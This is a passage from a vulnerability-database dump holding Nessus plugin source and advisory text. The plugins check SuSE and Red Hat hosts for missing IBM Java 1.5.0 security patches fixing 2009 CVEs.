attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6740.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-demo-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-src-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:17", "description": "Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running\ninstances of IBM Java must be restarted for this update to take\neffect.", "edition": 29, "published": "2009-12-09T00:00:00", "title": "RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:1647)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2010-0079", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-09T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin"], "id": "REDHAT-RHSA-2009-1647.NASL", "href": "https://www.tenable.com/plugins/nessus/43079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1647. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43079);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\", \"CVE-2010-0079\");\n script_bugtraq_id(36881);\n script_xref(name:\"RHSA\", value:\"2009:1647\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:1647)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running\ninstances of IBM Java must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3877\"\n );\n # http://www.ibm.com/developerworks/java/jdk/alerts/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://developer.ibm.com/javasdk/support/security-vulnerabilities/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2009:1647\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:1647\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-demo-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-devel-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"java-1.5.0-ibm-src-1.5.0.11-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-accessibility-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-demo-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-devel-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.5.0-ibm-javacomm-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390\", reference:\"java-1.5.0-ibm-jdbc-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"java-1.5.0-ibm-plugin-1.5.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"java-1.5.0-ibm-src-1.5.0.11-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.5.0-ibm / java-1.5.0-ibm-accessibility / java-1.5.0-ibm-demo / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:26", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues. It also contains a timezone update for the\ncurrent Fiji change (timezone 1.6.9s).\n\nThe update fixes the following security issues : \n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876, CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also refer to http://www.ibm.com/developerworks/java/jdk/alerts\nfor more information about this update.", "edition": 24, "published": "2009-12-27T00:00:00", "title": "SuSE9 Security Update : IBM Java 1.5.0 (YOU Patch Number 12564)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-27T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12564.NASL", "href": "https://www.tenable.com/plugins/nessus/43599", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43599);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE9 Security Update : IBM Java 1.5.0 (YOU Patch Number 12564)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues. It also contains a timezone update for the\ncurrent Fiji change (timezone 1.6.9s).\n\nThe update fixes the following security issues : \n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876, CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also refer to http://www.ibm.com/developerworks/java/jdk/alerts\nfor more information about this update.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12564.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n 